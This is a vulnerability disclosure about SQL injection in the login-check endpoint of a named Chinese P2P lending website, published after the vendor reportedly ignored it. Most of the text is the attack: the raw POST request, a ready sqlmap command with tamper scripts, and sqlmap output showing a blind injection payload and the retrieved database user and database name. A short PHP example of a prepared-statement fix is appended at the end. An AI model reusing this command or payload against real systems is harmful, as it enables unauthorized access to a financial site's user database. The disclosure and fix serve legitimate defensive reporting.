2015-11-10: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-12-25: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
宝点网 (Baodian Wang) operates mainly over the Internet, relying on advanced technology and built on a premise of good faith, with operations running primarily through personal wealth-management accounts. 宝点网 follows a "one account, two identities" principle, dividing its customers into borrowers and investors.
Vulnerable URL:
POST /ucenter/login/checkUser HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.bao.cn:443/
Cookie: PHPSESSID=coeiqujoclndb0fjf54l8ilkn2; NoviceGuide=my+value
Host: www.bao.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

name=e&ps=e
The injectable parameter is name.
sqlmap.py -r bao.txt --dbs --current-db --current-user --is-dba --tamper=space2comment,between --level 5 --risk 3 -p name
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 729 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: name=-8761")) OR 9759=9759#&ps=e
---
[10:59:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:59:59] [INFO] testing MySQL
[11:00:04] [INFO] confirming MySQL
[11:00:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:00:19] [INFO] fetching current user
[11:00:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:00:19] [INFO] retrieved: zhang@%
current user: 'zhang@%'
[11:02:53] [INFO] fetching current database
[11:02:53] [INFO] retrieved: newbao
Database:
The main database has 157 tables; it is far too slow, so I did not dump it T_T
Fix: parameter filtering.
Vendor response: could not reach the vendor, or the vendor actively refused.
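As an added illustration of the fix (this is not the vendor's code; the real checkUser handler is not on the page), a hardened PHP login pre-check for an endpoint like /ucenter/login/checkUser: the name parameter is whitelisted and then bound through a PDO prepared statement, so the `"))` string context the sqlmap payload closed no longer exists. The table name member, the column names and the database credentials are assumed placeholders.

```php
<?php
// Added example, not the vendor's code. The original handler is unknown;
// the boolean-based blind finding implies the name value was concatenated
// into a ("...") string inside the WHERE clause. The version below never
// lets the value reach the SQL parser as SQL.

function checkUser(PDO $db, string $name): bool
{
    // 1. Whitelist the parameter's shape before it touches the database.
    //    Assumed account-name policy: 3-20 letters, digits or underscores.
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $name)) {
        return false;
    }

    // 2. Bind the value as data with a server-side prepared statement.
    //    Assumed table/column names: member(name).
    $stmt = $db->prepare('SELECT 1 FROM member WHERE name = :name LIMIT 1');
    $stmt->execute([':name' => $name]);

    return $stmt->fetchColumn() !== false;
}

// Placeholder credentials; newbao is the database name sqlmap reported.
// ATTR_EMULATE_PREPARES=false makes MySQL do the binding, not the client.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=newbao;charset=utf8mb4',
    'app_user',
    'PLACEHOLDER_PASSWORD',
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

header('Content-Type: application/json');
echo json_encode(['exists' => checkUser($db, $_POST['name'] ?? '')]);
```

The whitelist alone is not the control; the prepared statement is, and the whitelist simply rejects obviously malformed input early and keeps it out of the logs.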